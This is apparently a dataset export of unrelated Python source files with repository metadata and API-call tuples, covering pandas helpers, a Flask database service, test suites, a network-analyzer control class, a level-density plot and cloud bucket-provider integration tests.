for col in columns:
new_col = col
if percent_names:
new_col = f"{new_col} %"
multiplier = 100.0 # to get percent
percent_df[new_col] = multiplier * df[col] / totals_series
return percent_df
def get_rows_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
row_sums = df.sum(axis=0)
return df.multiply(100.0) / row_sums
def get_total_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
total = df.sum(axis=0).sum()
return df.multiply(100.0) / total
def df_handle_below_minimum_floats(df: pd.DataFrame) -> pd.DataFrame:
def handle_if_below_min(series):
if series.dtype == 'd':
too_small_mask = abs(series) < sys.float_info.min
series[too_small_mask] = sys.float_info.min
return series
return df.apply(handle_if_below_min, axis=0)
def nan_to_none(val):
if np.isnan(val):
val = None
return val
def df_nan_to_none(df: pd.DataFrame) -> pd.DataFrame:
return df.where((pd.notnull(df)), None)
def df_replace_nan(df: pd.DataFrame, nan_replace='') -> pd.DataFrame:
return df.where((pd.notnull(df)), nan_replace)
def read_csv_skip_header(fle, header='#', **kwargs) -> pd.DataFrame:
if os.stat(fle).st_size == 0:
raise ValueError("File is empty")
with open(fle) as f:
pos = 0
cur_line = f.readline()
while cur_line.startswith(header):
pos = f.tell()
cur_line = f.readline()
f.seek(pos)
return pd.read_csv(f, **kwargs)
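

# Hedged usage sketch (not in the original module): exercises the percent
# helpers on a tiny frame; the values are illustrative only.
if __name__ == '__main__':
    demo = pd.DataFrame({'a': [1, 3], 'b': [3, 1]})
    print(get_columns_percent_dataframe(demo))  # each row scaled to its row total
    print(get_total_percent_dataframe(demo))    # each value vs. the grand total (8)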
| [((13, 17, 13, 45), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((56, 7, 56, 20), 'numpy.isnan', 'np.isnan', ({(56, 16, 56, 19): 'val'}, {}), '(val)', True, 'import numpy as np\n'), ((62, 21, 62, 35), 'pandas.notnull', 'pd.notnull', ({(62, 32, 62, 34): 'df'}, {}), '(df)', True, 'import pandas as pd\n'), ((66, 21, 66, 35), 'pandas.notnull', 'pd.notnull', ({(66, 32, 66, 34): 'df'}, {}), '(df)', True, 'import pandas as pd\n'), ((79, 15, 79, 39), 'pandas.read_csv', 'pd.read_csv', ({(79, 27, 79, 28): 'f'}, {}), '(f, **kwargs)', True, 'import pandas as pd\n'), ((70, 7, 70, 19), 'os.stat', 'os.stat', ({(70, 15, 70, 18): 'fle'}, {}), '(fle)', False, 'import os\n')] |
grace1307/lan_mapper | app/services/base.py | 5d244078732b86a2e38a5b21436ffca83c689eeb | from app.db import db
# Silently ignores rows the db can't find when updating/deleting
# TODO: don't ignore it; raise an error instead and remove the checkers in the views
class BaseService:
__abstract__ = True
model = None
# Create
def add_one(self, **kwargs):
new_row = self.model(**kwargs)
db.session.add(new_row)
        db.session.commit()  # SQLAlchemy autoflushes, so the commit alone may be enough here
return new_row
# Read
def select_one(self, id):
return self.model.query.filter(self.model.id == id).one_or_none()
def select_all(self, conditions: list = None, sort_by=None, is_asc=None):
query = db.session.query(self.model)
if conditions is not None:
for condition in conditions:
query = query.filter(condition)
if sort_by is not None and is_asc is not None:
sort_column = self.model.__table__._columns[sort_by]
is_asc = is_asc == 'true'
if sort_column is not None:
query = query.order_by(sort_column.asc() if is_asc else sort_column.desc())
return query.all()
# Update
def update_one(self, id, updated):
row = self.model.query.filter(self.model.id == id)
row_result = row.one_or_none()
if row_result is not None:
row.update(updated)
db.session.commit()
return row.one_or_none()
# Delete
def delete_one(self, id):
row = self.select_one(id)
if row is not None:
db.session.delete(row)
db.session.commit()
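

# Hedged usage sketch (not in the original file): a concrete service is a thin
# subclass that pins `model` to a SQLAlchemy model class. `User` is hypothetical.
#
# class UserService(BaseService):
#     model = User
#
# user_service = UserService()
# user = user_service.add_one(name='alice')
# matches = user_service.select_all(conditions=[User.name == 'alice'])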
| [((13, 8, 13, 31), 'app.db.db.session.add', 'db.session.add', ({(13, 23, 13, 30): 'new_row'}, {}), '(new_row)', False, 'from app.db import db\n'), ((14, 8, 14, 27), 'app.db.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from app.db import db\n'), ((23, 16, 23, 44), 'app.db.db.session.query', 'db.session.query', ({(23, 33, 23, 43): 'self.model'}, {}), '(self.model)', False, 'from app.db import db\n'), ((45, 12, 45, 31), 'app.db.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from app.db import db\n'), ((54, 12, 54, 34), 'app.db.db.session.delete', 'db.session.delete', ({(54, 30, 54, 33): 'row'}, {}), '(row)', False, 'from app.db import db\n'), ((55, 12, 55, 31), 'app.db.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from app.db import db\n')] |
QUDUSKUNLE/Python-Flask | set.py | 5990572b17923c976907c2fa5c2a9790f3a7c869 | """
How to set up a virtual environment:
pip install virtualenv
pip install virtualenvwrapper
# export WORKON_HOME=~/Envs
source /usr/local/bin/virtualenvwrapper.sh
# To create a virtualenv and set up Flask:
1. mkvirtualenv my-venv
2. workon my-venv
3. pip install Flask
4. pip freeze
5. Put all dependencies in a file:
   pip freeze > requirements.txt
6. run.py: entry point of the application
7. Relational database management systems: SQLite, MySQL, PostgreSQL.
   SQLAlchemy is an Object Relational Mapper (ORM), which means that it
   connects the objects of an application to tables in a relational
   database management system.
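
A minimal run.py sketch for step 6 (the route and module layout are assumptions,
not part of the original notes):

    from flask import Flask

    app = Flask(__name__)

    @app.route('/')
    def index():
        return 'Hello, Flask!'

    if __name__ == '__main__':
        app.run(debug=True)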
""" | [] |
Badboy-16/SemiBin | test/test_generate_data_coassembly.py | 501bc1a7e310104c09475ca233a3f16d081f129a | from SemiBin.main import generate_data_single
import os
import pytest
import logging
import pandas as pd
def test_generate_data_coassembly():
logger = logging.getLogger('SemiBin')
logger.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setFormatter(logging.Formatter('%(asctime)s - %(message)s'))
logger.addHandler(sh)
os.makedirs('output_coassembly',exist_ok=True)
generate_data_single(bams=['test/coassembly_sample_data/input.sorted1.bam',
'test/coassembly_sample_data/input.sorted2.bam',
'test/coassembly_sample_data/input.sorted3.bam',
'test/coassembly_sample_data/input.sorted4.bam',
'test/coassembly_sample_data/input.sorted5.bam'],
num_process=1,
logger=logger,
output='output_coassembly',
handle='test/coassembly_sample_data/input.fasta',
binned_short=False,
must_link_threshold=4000
)
data = pd.read_csv('output_coassembly/data.csv',index_col=0)
data_split = pd.read_csv('output_coassembly/data_split.csv',index_col=0)
assert data.shape == (40,141)
assert data_split.shape == (80,141) | [((8, 13, 8, 41), 'logging.getLogger', 'logging.getLogger', ({(8, 31, 8, 40): '"""SemiBin"""'}, {}), "('SemiBin')", False, 'import logging\n'), ((10, 9, 10, 32), 'logging.StreamHandler', 'logging.StreamHandler', ({}, {}), '()', False, 'import logging\n'), ((14, 4, 14, 50), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((15, 4, 26, 26), 'SemiBin.main.generate_data_single', 'generate_data_single', (), '', False, 'from SemiBin.main import generate_data_single\n'), ((28, 11, 28, 64), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((29, 17, 29, 76), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((11, 20, 11, 66), 'logging.Formatter', 'logging.Formatter', ({(11, 38, 11, 65): '"""%(asctime)s - %(message)s"""'}, {}), "('%(asctime)s - %(message)s')", False, 'import logging\n')] |
CarbonROM/android_tools_acloud | create/create_args_test.py | 0ed5352df639789767d8ea6fe0a510d7a84cfdcc | # Copyright 2020 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for create."""
import unittest
from unittest import mock
from acloud import errors
from acloud.create import create_args
from acloud.internal import constants
from acloud.internal.lib import driver_test_lib
def _CreateArgs():
"""set default pass in arguments."""
mock_args = mock.MagicMock(
flavor=None,
num=1,
adb_port=None,
hw_property=None,
stable_cheeps_host_image_name=None,
stable_cheeps_host_image_project=None,
username=None,
password=None,
cheeps_betty_image=None,
local_image=None,
local_kernel_image=None,
local_system_image=None,
system_branch=None,
system_build_id=None,
system_build_target=None,
local_instance=None,
remote_host=None,
host_user=constants.GCE_USER,
host_ssh_private_key_path=None,
avd_type=constants.TYPE_CF,
autoconnect=constants.INS_KEY_VNC)
return mock_args
# pylint: disable=invalid-name,protected-access
class CreateArgsTest(driver_test_lib.BaseDriverTest):
"""Test create_args functions."""
def testVerifyArgs(self):
"""test VerifyArgs."""
mock_args = _CreateArgs()
# Test args default setting shouldn't raise error.
self.assertEqual(None, create_args.VerifyArgs(mock_args))
def testVerifyArgs_ConnectWebRTC(self):
"""test VerifyArgs args.autconnect webrtc.
WebRTC only apply to remote cuttlefish instance
"""
mock_args = _CreateArgs()
mock_args.autoconnect = constants.INS_KEY_WEBRTC
# Test remote instance and avd_type cuttlefish(default)
# Test args.autoconnect webrtc shouldn't raise error.
self.assertEqual(None, create_args.VerifyArgs(mock_args))
# Test pass in none-cuttlefish avd_type should raise error.
mock_args.avd_type = constants.TYPE_GF
self.assertRaises(errors.UnsupportedCreateArgs,
create_args.VerifyArgs, mock_args)
if __name__ == "__main__":
unittest.main()
| [((28, 16, 49, 42), 'unittest.mock.MagicMock', 'mock.MagicMock', (), '', False, 'from unittest import mock\n'), ((82, 4, 82, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((61, 31, 61, 64), 'acloud.create.create_args.VerifyArgs', 'create_args.VerifyArgs', ({(61, 54, 61, 63): 'mock_args'}, {}), '(mock_args)', False, 'from acloud.create import create_args\n'), ((73, 31, 73, 64), 'acloud.create.create_args.VerifyArgs', 'create_args.VerifyArgs', ({(73, 54, 73, 63): 'mock_args'}, {}), '(mock_args)', False, 'from acloud.create import create_args\n')] |
Kannuki-san/msman | setup.py | adc275ad0508d65753c8424e7f6b94becee0b855 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from cx_Freeze import setup,Executable
icondata='icon.ico'
base = None
# GUI=有効, CUI=無効 にする
if sys.platform == 'win32' : base = 'win32GUI'
exe = Executable(script = 'main.py',
base = base,
#icon=icondata
)
setup(name = 'MSman',
version = '0.1',
description = 'Minecraft Server Manager',
executables = [exe]
) | [((16, 6, 19, 19), 'cx_Freeze.Executable', 'Executable', (), '', False, 'from cx_Freeze import setup, Executable\n'), ((22, 0, 26, 7), 'cx_Freeze.setup', 'setup', (), '', False, 'from cx_Freeze import setup, Executable\n')] |
petee-d/stereotype | stereotype/roles.py | 33a2efc826fd907bd23ffb4e8f7cba119ff022ce | from __future__ import annotations
from threading import Lock
from typing import List, Set, Optional, Any, Tuple
from stereotype.utils import ConfigurationError
class Role:
__slots__ = ('code', 'name', 'empty_by_default')
def __init__(self, name: str, empty_by_default: bool = False):
self.name = name
self.empty_by_default = empty_by_default
with _roles_lock:
self.code = len(_roles)
_roles.append(self)
def __repr__(self):
return f'<Role {self.name}, empty_by_default={self.empty_by_default}, code={self.code}>'
def __hash__(self):
return self.code
def __eq__(self, other):
return type(self) == type(other) and self.code == other.code
def whitelist(self, *fields, override_parents: bool = False):
return RequestedRoleFields(self, fields, is_whitelist=True, override_parents=override_parents)
def blacklist(self, *fields, override_parents: bool = False):
return RequestedRoleFields(self, fields, is_whitelist=False, override_parents=override_parents)
_roles: List[Role] = []
_roles_lock = Lock()
DEFAULT_ROLE = Role('default')
class FinalizedRoleFields:
__slots__ = ('role', 'fields')
def __init__(self, role: Role, fields: Optional[Set[str]] = None):
self.role = role
self.fields = fields or set()
def update_requested(self, other: RequestedRoleFields, all_field_names: Set[str], field_names: Set[str]):
assert self.role == other.role
if other.override_parents:
initial = set() if other.is_whitelist else all_field_names
else:
initial = self.fields
if other.is_whitelist:
self.fields = initial | other.fields
else:
self.fields = (initial | field_names) - other.fields
class RequestedRoleFields:
__slots__ = ('role', 'fields', 'is_whitelist', 'override_parents')
def __init__(self, role: Role, fields, is_whitelist: bool, override_parents: bool):
self.fields, non_descriptors = self._collect_input_fields(fields)
if non_descriptors:
raise ConfigurationError(f'Role blacklist/whitelist needs member descriptors (e.g. cls.my_field), '
f'got {non_descriptors[0]!r}')
self.role = role
self.is_whitelist = is_whitelist
self.override_parents = override_parents
def _collect_input_fields(self, fields) -> Tuple[Set[str], List[Any]]:
field_names: Set[str] = set()
non_descriptors: List[Any] = []
for field in fields:
if type(field).__name__ == 'member_descriptor':
field_names.add(field.__name__)
elif isinstance(field, property):
field_names.add(field.fget.__name__)
else:
non_descriptors.append(field)
return field_names, non_descriptors
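

# Hedged usage sketch (not part of the module): fields are selected with member
# descriptors, as validated above. `MyModel` is hypothetical and only
# illustrates the descriptor requirement.
#
# class MyModel:
#     __slots__ = ('name', 'secret')
#
# ADMIN = Role('admin')
# fields = ADMIN.blacklist(MyModel.secret)  # accepted: member descriptor
# ADMIN.whitelist('secret')                 # raises ConfigurationError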
| [((36, 14, 36, 20), 'threading.Lock', 'Lock', ({}, {}), '()', False, 'from threading import Lock\n'), ((66, 18, 67, 67), 'stereotype.utils.ConfigurationError', 'ConfigurationError', ({(66, 37, 67, 66): 'f"""Role blacklist/whitelist needs member descriptors (e.g. cls.my_field), got {non_descriptors[0]!r}"""'}, {}), "(\n f'Role blacklist/whitelist needs member descriptors (e.g. cls.my_field), got {non_descriptors[0]!r}'\n )", False, 'from stereotype.utils import ConfigurationError\n')] |
coderdq/vuetest | WEB21-1-12/WEB2/power/zvl_test.py | 28ea4f36e2c4e7e80d1ba1777ef312733ef84048 | # coding:utf-8
'''
Vector network analyzer test items, including gain, in-band ripple and VSWR.
A single trace can hold at most 10 markers.
'''
import os
import logging
from commoninterface.zvlbase import ZVLBase
logger = logging.getLogger('ghost')
class HandleZVL(object):
def __init__(self, ip, offset):
self.zvl = None
self.ip = ip
self.offset = float(offset)
def init_zvl(self, path):
logger.debug('init zvl')
self.zvl = ZVLBase()
self.zvl.init_inst(self.ip)
self.zvl.reset_zvl()
        self.path = path  # path used for saving screenshots
def close_zvl(self):
self.zvl.close_inst()
def set_edge(self, low_edge, up_edge):
'''
        :param low_edge: float, in MHz
        :param up_edge: float, in MHz
:return:
'''
try:
low = '{}MHz'.format(low_edge)
up = '{}MHz'.format(up_edge)
self.zvl.set_freq(low, up)
return True
except Exception as e:
logger.error('set_edge error {}'.format(e))
return False
def set_trace(self, tracen, form, means):
'''
        :param tracen: int
        :param form: str, trace format, e.g. 'MLOG' or 'SWR'
        :param means: str, one of 'S11', 'S12', 'S21', 'S22'
:return:
'''
try:
self.zvl.set_trace_form(tracen, form)
self.zvl.change_trace_meas(tracen, means)
if form == 'MLOG':
self.zvl.set_div_value(tracen, 10)
# zvl.set_ref_value(zvlhandler, tracen, -40)
return True
except Exception as e:
logger.error('set_trace error {}'.format(e))
return False
def read_markery(self, tracen, markern, x):
x_str = '{}MHz'.format(x)
        self.zvl.set_trace_marker(tracen, markern, x_str)  # place the marker
_, marker1y = self.zvl.query_marker(tracen, markern)
return marker1y
def read_max_marker(self, tracen, markern):
try:
self.zvl.create_max_marker(tracen, markern) # max marker
# create_max_marker(zvlhandler, tracen, markern + 1) # max marker
marker1x, marker1y = self.zvl.query_marker(tracen, markern)
return float(marker1x) / 1000000.0, marker1y
except Exception as e:
logger.error('get_max_loss error {}'.format(e))
return None
def get_ripple_in_bw(self, tracen, markern):
'''
        In-band ripple: |max - min| within the band
:return:
'''
try:
self.zvl.create_min_marker(tracen, markern) # min marker
self.zvl.create_max_marker(tracen, markern + 1) # max marker
_, marker1y = self.zvl.query_marker(tracen, markern)
_, marker2y = self.zvl.query_marker(tracen, markern + 1)
absy = abs(float(marker1y) - float(marker2y))
return absy
except Exception as e:
logger.error('get_ripple_in_bw error{}'.format(e))
return None
def get_gain(self, *args):
'''
        Read the gain and the in-band ripple
        S21, dB magnitude
        :return: gain at the high, mid and low points, plus the in-band ripple
'''
logger.debug('zvl get gain')
        high, mid, low = args  # high, mid and low frequencies
self.zvl.remove_allmarker(1)
self.set_edge(low, high)
tracen = 1
self.set_trace(tracen, 'MLOG', 'S21')
markern = 1
        # read the gain at the high, mid and low points
high_markery = float(self.read_markery(tracen, markern, high))
markern += 1
mid_markery = float(self.read_markery(tracen, markern, mid))
markern += 1
low_markery = float(self.read_markery(tracen, markern, low))
        # in-band ripple
        markern += 1
        ripple = self.get_ripple_in_bw(tracen, markern)  # absolute value
ret = [high_markery + self.offset, mid_markery + self.offset,
low_markery + self.offset, ripple]
ret2 = ['%.2f' % float(item) for item in ret]
return ret2
def get_vswr(self, *args):
'''
        VSWR: S11 trace in SWR format
        :return: max marker x (MHz), max marker y
'''
logger.debug('zvl get_vswr')
self.zvl.remove_allmarker(1)
        high, mid, low, dl_ul, temp = args  # high, mid and low frequencies
tracen = 1
markern = 1
start = float(low) - 2.5
end = float(high) + 2.5
self.set_edge(start, end)
self.set_trace(tracen, 'SWR', 'S11')
marker = self.read_max_marker(tracen, markern)
        # take a screenshot
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_{}_VSWR.PNG'.format(temp, dl_ul,end))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
# mstr='@'.join([str(item) for item in marker])
marker2 = ['%.2f' % float(item) for item in marker]
return marker2
def get_gain_vs_freq(self, markerlist,dl_ul, temp):
'''
825~835MHz,870~880,890~915,935~960,1570.42~1585,
1710~1785,1805~1880,1920~1980,2110~2170,
2570~2620,1880~1915,2300~2400,2400~2483.5
        Take three screenshots; each screenshot holds at most 10 markers.
        markerlist: []
:return:
'''
logger.debug('zvl get_gain_vs_freq')
self.zvl.remove_allmarker(1)
tracen = 1
markern = 1
self.set_trace(tracen, 'MLOG', 'S21')
        markery_list = []  # gain at every marker point; remember to add the offset
try:
            # first screenshot
self.set_edge(700, 1700)
marker_lst = markerlist[:10]
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern) # str
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_1.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
self.zvl.remove_allmarker(1)
            # second screenshot
marker_lst = markerlist[10:20]
markern = 1
self.set_edge(1700, 3000)
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern)
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_2.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
self.zvl.remove_allmarker(1)
            # third screenshot
marker_lst = markerlist[20:]
markern = 1
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern)
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_3.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
except Exception as e:
logger.error(e)
finally:
# logger.debug(markery_list)
ret = ['%.2f' % (float(item) + self.offset) for item in markery_list]
return ret
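
# Hedged usage sketch (not part of the original script); the instrument IP,
# offset, screenshot path and band edges below are placeholders.
#
# handler = HandleZVL('192.168.0.10', offset=0.5)
# handler.init_zvl(r'c:\results\run1\shot.png')
# high_gain, mid_gain, low_gain, ripple = handler.get_gain(960, 947.5, 935)
# handler.close_zvl()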
| [((10, 9, 10, 35), 'logging.getLogger', 'logging.getLogger', ({(10, 27, 10, 34): '"""ghost"""'}, {}), "('ghost')", False, 'import logging\n'), ((21, 19, 21, 28), 'commoninterface.zvlbase.ZVLBase', 'ZVLBase', ({}, {}), '()', False, 'from commoninterface.zvlbase import ZVLBase\n'), ((141, 31, 141, 57), 'os.path.dirname', 'os.path.dirname', ({(141, 47, 141, 56): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((173, 35, 173, 61), 'os.path.dirname', 'os.path.dirname', ({(173, 51, 173, 60): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((186, 35, 186, 61), 'os.path.dirname', 'os.path.dirname', ({(186, 51, 186, 60): 'self.path'}, {}), '(self.path)', False, 'import os\n'), ((198, 35, 198, 61), 'os.path.dirname', 'os.path.dirname', ({(198, 51, 198, 60): 'self.path'}, {}), '(self.path)', False, 'import os\n')] |
ErlendLima/70Zn | kshell/partial_level_density.py | 1bf73adec5a3960e195788bc1f4bc79b2086be64 | from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import shellmodelutilities as smutil
# Set bin width and range
bin_width = 0.20
Emax = 14
Nbins = int(np.ceil(Emax/bin_width))
Emax_adjusted = bin_width*Nbins # Trick to get an integer number of bins
bins = np.linspace(0,Emax_adjusted,Nbins+1)
# Define list of calculation input files and corresponding label names
inputfile = "summary_Zn70_jun45.txt"
# Instantiate figure which we will fill
f_rho, ax_rho = plt.subplots(1,1)
# Read energy levels from file
levels = smutil.read_energy_levels(inputfile)
# Choose which [2*J,pi] combinations to include in partial level density plot
Jpi_list = [[0,-1],[2,-1],[4,-1],[6,-1],[8,-1],[10,-1],[12,-1],[14,-1],[16,-1],[18,-1],[20,-1],[22,-1],[24,-1],[26,-1],[28,-1],
[0,+1],[2,+1],[4,+1],[6,+1],[8,+1],[10,+1],[12,+1],[14,+1],[16,+1],[18,+1],[20,+1],[22,+1],[24,+1],[26,+1],[28,+1]]
# Allocate (Ex,Jpi) matrix to store partial level density
rho_ExJpi = np.zeros((Nbins,len(Jpi_list)))
# Count number of levels for each (Ex, J, pi) pixel.
Egs = levels[0,0] # Ground state energy
for i_l in range(len(levels[:,0])):
E, J, pi = levels[i_l]
# Skip if level is outside range:
if E-Egs >= Emax:
continue
i_Ex = int(np.floor((E-Egs)/bin_width))
try:
i_Jpi = Jpi_list.index([J,pi])
except:
continue
rho_ExJpi[i_Ex,i_Jpi] += 1
rho_ExJpi /= bin_width # Normalize to bin width, to get density in MeV^-1
# Plot it
from matplotlib.colors import LogNorm # To get log scaling on the z axis
colorbar_object = ax_rho.pcolormesh(np.linspace(0,len(Jpi_list)-1,len(Jpi_list)), bins, rho_ExJpi, norm=LogNorm())
f_rho.colorbar(colorbar_object) # Add colorbar to plot
# Make the plot nice
ax_rho.set_xlabel(r"$\pi\cdot J\,\mathrm{(\hbar)}$")
ax_rho.set_ylabel(r'$E_x \, \mathrm{(MeV)}$')
# A bit of Python voodoo to get the x labels right:
Jpi_array = np.append(np.linspace(0,-int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2)),np.linspace(0,int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2))) # Array of pi*J for plot
def format_func(value, tick_number):
if value >= 0 and value <= 28:
return int(Jpi_array[int(value)])
else:
return None
ax_rho.set_xlim([0,29])
ax_rho.xaxis.set_major_formatter(plt.FuncFormatter(format_func))
ax_rho.set_xticks([0,2,4,6,8,10,12,14,15,17,19,21,23,25,27])
# Show plot
plt.show()
| [((13, 7, 13, 43), 'numpy.linspace', 'np.linspace', ({(13, 19, 13, 20): '0', (13, 21, 13, 34): 'Emax_adjusted', (13, 35, 13, 42): 'Nbins + 1'}, {}), '(0, Emax_adjusted, Nbins + 1)', True, 'import numpy as np\n'), ((19, 16, 19, 33), 'matplotlib.pyplot.subplots', 'plt.subplots', ({(19, 29, 19, 30): '1', (19, 31, 19, 32): '1'}, {}), '(1, 1)', True, 'import matplotlib.pyplot as plt\n'), ((22, 9, 22, 45), 'shellmodelutilities.read_energy_levels', 'smutil.read_energy_levels', ({(22, 35, 22, 44): 'inputfile'}, {}), '(inputfile)', True, 'import shellmodelutilities as smutil\n'), ((68, 0, 68, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((11, 12, 11, 35), 'numpy.ceil', 'np.ceil', ({(11, 20, 11, 34): 'Emax / bin_width'}, {}), '(Emax / bin_width)', True, 'import numpy as np\n'), ((64, 33, 64, 63), 'matplotlib.pyplot.FuncFormatter', 'plt.FuncFormatter', ({(64, 51, 64, 62): 'format_func'}, {}), '(format_func)', True, 'import matplotlib.pyplot as plt\n'), ((37, 15, 37, 42), 'numpy.floor', 'np.floor', ({(37, 24, 37, 41): '(E - Egs) / bin_width'}, {}), '((E - Egs) / bin_width)', True, 'import numpy as np\n'), ((49, 104, 49, 113), 'matplotlib.colors.LogNorm', 'LogNorm', ({}, {}), '()', False, 'from matplotlib.colors import LogNorm\n')] |
neuro-inc/platform-buckets-api | tests/integration/test_provider_base.py | ba04edeb8565fa06e5af6d0316957a8816b087b2 | import abc
import secrets
from collections.abc import AsyncIterator, Awaitable, Callable, Mapping
from contextlib import AbstractAsyncContextManager, asynccontextmanager
from dataclasses import dataclass
from datetime import datetime, timezone
import pytest
from aiohttp import ClientSession
from yarl import URL
from platform_buckets_api.providers import (
BucketExistsError,
BucketNotExistsError,
BucketPermission,
BucketProvider,
RoleExistsError,
UserBucketOperations,
)
from platform_buckets_api.storage import ImportedBucket, ProviderBucket
BUCKET_NAME_PREFIX = "integration-tests-"
ROLE_NAME_PREFIX = "integration-tests-"
def _make_bucket_name() -> str:
return BUCKET_NAME_PREFIX + secrets.token_hex(5)
def _make_role_name() -> str:
return ROLE_NAME_PREFIX + secrets.token_hex(5)
class BasicBucketClient(abc.ABC):
@abc.abstractmethod
async def put_object(self, key: str, data: bytes) -> None:
pass
@abc.abstractmethod
async def read_object(self, key: str) -> bytes:
pass
@abc.abstractmethod
async def list_objects(self) -> list[str]:
pass
@abc.abstractmethod
async def delete_object(self, key: str) -> None:
pass
@dataclass()
class ProviderTestOption:
type: str
provider: BucketProvider
bucket_exists: Callable[[str], Awaitable[bool]]
make_client: Callable[
[ProviderBucket, Mapping[str, str]],
AbstractAsyncContextManager[BasicBucketClient],
]
get_admin: Callable[
[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]
]
role_exists: Callable[[str], Awaitable[bool]]
get_public_url: Callable[[str, str], URL]
credentials_for_imported: Mapping[str, str]
def as_admin_cm(
creator_func: Callable[[ProviderBucket], BasicBucketClient]
) -> Callable[[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]]:
@asynccontextmanager
async def creator(bucket: ProviderBucket) -> AsyncIterator[BasicBucketClient]:
yield creator_func(bucket)
return creator
# Access checkers
async def _test_no_access(
admin_client: BasicBucketClient,
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = secrets.token_hex(8)
with pytest.raises(Exception):
await user_client.put_object(key, data)
await admin_client.put_object(key, data)
with pytest.raises(Exception):
await user_client.read_object(key)
with pytest.raises(Exception):
await user_client.list_objects()
with pytest.raises(Exception):
await user_client.delete_object(key)
async def _test_read_access(
admin_client: BasicBucketClient,
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = "foo"
with pytest.raises(Exception):
await user_client.put_object(key, data)
await admin_client.put_object(key, data)
assert await user_client.read_object(key) == data
assert key in await user_client.list_objects()
with pytest.raises(Exception):
await user_client.delete_object(key)
async def _test_write_access(
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = "foo"
await user_client.put_object(key, data)
assert await user_client.read_object(key) == data
assert key in await user_client.list_objects()
await user_client.delete_object(key)
assert key not in await user_client.list_objects()
class TestProviderBase:
__test__ = False
async def test_bucket_create(self, provider_option: ProviderTestOption) -> None:
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
assert bucket.name == name
assert await provider_option.bucket_exists(name)
async def test_bucket_duplicate_create(
self,
provider_option: ProviderTestOption,
) -> None:
name = _make_bucket_name()
await provider_option.provider.create_bucket(name)
with pytest.raises(BucketExistsError):
await provider_option.provider.create_bucket(name)
async def test_bucket_delete(self, provider_option: ProviderTestOption) -> None:
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
await provider_option.provider.delete_bucket(bucket.name)
assert not await provider_option.bucket_exists(name)
async def test_bucket_delete_unknown(
self, provider_option: ProviderTestOption
) -> None:
with pytest.raises(BucketNotExistsError):
await provider_option.provider.delete_bucket(_make_bucket_name())
async def test_bucket_credentials_write_access(
self, provider_option: ProviderTestOption
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
credentials = await provider_option.provider.get_bucket_credentials(
bucket, write=True, requester="testing"
)
async with provider_option.make_client(bucket, credentials) as user_client:
await _test_write_access(user_client)
async def test_bucket_credentials_read_access(
self, provider_option: ProviderTestOption
) -> None:
        return  # NOTE: test disabled by this unconditional early return
if provider_option.type == "aws":
pytest.skip("Moto do not support embedding policies into token")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
credentials = await provider_option.provider.get_bucket_credentials(
bucket, write=False, requester="testing"
)
async with provider_option.make_client(
bucket, credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
async def test_signed_url_for_blob(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto fails for signed url with 500")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("foo/bar", b"test data")
